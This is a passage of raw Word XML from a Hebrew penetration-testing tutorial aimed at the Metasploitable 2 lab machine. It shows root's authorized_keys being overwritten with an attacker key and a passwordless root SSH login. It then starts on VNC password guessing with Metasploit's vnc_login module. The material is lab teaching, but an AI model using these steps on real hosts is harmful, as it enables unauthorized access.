        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6020FF" w14:textId="21DEAB15" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7656134D" w14:textId="787BDA2D" w:rsidR="00367A6B" w:rsidRPr="007D51BF" w:rsidRDefault="00367A6B" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3476A6F1" w14:textId="0FDCA002" w:rsidR="00D11A12" w:rsidRPr="007D51BF" w:rsidRDefault="00D11A12" w:rsidP="00367A6B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אחרי שראיתי שהתקיה נמצאת נעבור לתקיית ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh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ונעברו על כמה דברים כדי לוודא שאנחנו פועלים נכון ונבדוק מה קיים בה</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426DEE4D" w14:textId="52AEF590" w:rsidR="00D11A12" w:rsidRPr="007D51BF" w:rsidRDefault="00D11A12" w:rsidP="00367A6B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B5E572E" wp14:editId="726AF743">
            <wp:extent cx="3140050" cy="777240"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="96" name="תמונה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99" cy="78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AF1F" w14:textId="5DB939F6" w:rsidR="00D11A12" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B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נריץ את הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls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ונראה שיש קובץ שנקרא </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8289E1" w14:textId="19C4E73E" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B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3686DF4A" wp14:editId="340916D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1459230</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>325120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5186172" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="100" name="תמונה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72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קובץ זה שומר בתוכו את כל המפתחות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh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שניתן להשתמש בהם כדי להתחבר מרחוק</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7F8F6" w14:textId="2B46BB21" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53859896" w14:textId="473B83CA" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513BB94B" w14:textId="7B405513" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0CAA24" w14:textId="76E82B2C" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CD402E" w14:textId="3423EEAB" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6187D44F" w14:textId="5D230A92" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B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לאחר שהקובץ קיים ואנחנו יודעים את המיקום שלו נעתיק לאותה תקיה את המפתח הציבורי את שיצרנו קודם</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA354AD" w14:textId="7DC22028" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B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7A917AF7" wp14:editId="1B589A3E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6522720" cy="784860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="101" name="תמונה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590F8" w14:textId="134F1FD2" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B11303" w14:textId="6F1908DE" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C37E7B" w14:textId="7A134A88" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C46B54" w14:textId="792E6596" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00A57DE4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">ועכשיו נעביר את תוכן הקובץ </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nfs_rsa.pub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לקובץ </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>authorized_keys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כדי שיוכל להזהות את ההתחברות</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300B38F9" w14:textId="03FC3151" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B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03E15B64" wp14:editId="661D331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251379" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="102" name="תמונה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379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CA28A" w14:textId="093E4A7C" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BC28F3" w14:textId="0E7BCB12" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2A2E62" w14:textId="73422BF5" w:rsidR="00A57DE4" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="00367A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A3239C" w14:textId="1A88C84C" w:rsidR="006042E0" w:rsidRPr="007D51BF" w:rsidRDefault="00A57DE4" w:rsidP="006042E0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אחרי שהעתקנו את המ</w:t>
      </w:r>
      <w:r w:rsidR="006042E0" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>פתח לקובץ ננסה להתחבר כ</w:t>
      </w:r>
      <w:r w:rsidR="006042E0" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="006042E0" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב</w:t>
      </w:r>
      <w:r w:rsidR="006042E0" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C78BD84" w14:textId="0DC56F60" w:rsidR="006042E0" w:rsidRPr="007D51BF" w:rsidRDefault="006042E0" w:rsidP="006042E0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הפקודה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ssh -i /root.ssh/nfs_rsa root 192.168.1.157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E7184" w14:textId="6BC6BF69" w:rsidR="006042E0" w:rsidRPr="007D51BF" w:rsidRDefault="006042E0" w:rsidP="006042E0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1773A66" wp14:editId="5AD9ACCB">
            <wp:extent cx="5875020" cy="2541990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103" name="תמונה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50" cy="25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C2A7" w14:textId="13C12604" w:rsidR="006042E0" w:rsidRPr="007D51BF" w:rsidRDefault="006042E0" w:rsidP="006042E0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5CBA38DF" wp14:editId="5F0EE46F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5318760" cy="3112586"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="104" name="תמונה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11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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ונראה שאנחנו מחוברים כ</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ללא סיסמא.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0126DF" w14:textId="44481EBE" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD029E1" w14:textId="55E361D2" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2CA144" w14:textId="3E33575D" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52AB6453" w14:textId="1434A051" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F706F0" w14:textId="3CD1F1EA" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3A77D8" w14:textId="27149181" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1EDB40" w14:textId="49CE1AD7" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E875DD" w14:textId="2AFE44E7" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A60C70" w14:textId="38381036" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D2B445" w14:textId="035A8DF1" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440405FB" w14:textId="69664732" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C64147" w14:textId="37C2FACA" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1BE17D" w14:textId="1EA6448A" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA02A96" w14:textId="7A8EAF21" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE181E5" w14:textId="3C41003D" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B2FA08" w14:textId="012EBE88" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="006C7127" w:rsidP="006042E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F042B1C" w14:textId="675BE7F0" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A" w:rsidP="006042E0">
      <w:pP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</w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VNC – (</w:t>
      </w:r>
      <w:r w:rsidR="006C7127" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Virtual Network Computing</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006C7127" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA76D6" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>port 5900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F4A9FD" w14:textId="63404B4B" w:rsidR="006C7127" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A" w:rsidP="006042E0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t>vnc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הוא שירות המאפשר השתלטות מרחוק על המערכת באמצעות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GUI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שמציג את המסך של המערכת הנתקפת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34956885" w14:textId="2A7DD5D6" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A" w:rsidP="006042E0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ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploitable 2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מותקן </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vnc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גירסה 3.3 שקיימת בו חולשת אבטחה מאוד פשוטה וקלה לניצול.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D83C2" w14:textId="7948FE5F" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A" w:rsidP="0054583A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אז ניגש ל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053815F" w14:textId="033E6F1F" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A" w:rsidP="0054583A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ונחפש </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vnc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עם הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D39ABAA" w14:textId="1813ABB8" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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t>search vnc</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF6971" w14:textId="4A45FF21" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A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ונחבר במודול מספר 3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07424DBC" w14:textId="6F4A789A" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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t>auxiliary/scanner/vnc/vnc_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FD030" w14:textId="7A598095" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A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45632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A4C8247" wp14:editId="6B62390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637020" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="97" name="תמונה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A7070" w14:textId="18283FCD" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A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5B244E0C" w14:textId="1AD31381" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A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2E9FF9FB" w14:textId="4A45DBEA" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A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75126FA7" w14:textId="5F525D17" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A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75CA2C45" w14:textId="3A76287F" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A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61FC5585" w14:textId="40F2443E" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="0054583A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המודול הזה יאתר את הסיסמא שאיתה אוכל להתחבר עם </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vnc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2930DF2F" w14:textId="0A4F3164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כעת נשתמש במודול הזה ונציג את האפשרויות</w:t>
      </w:r>
    </w:p>
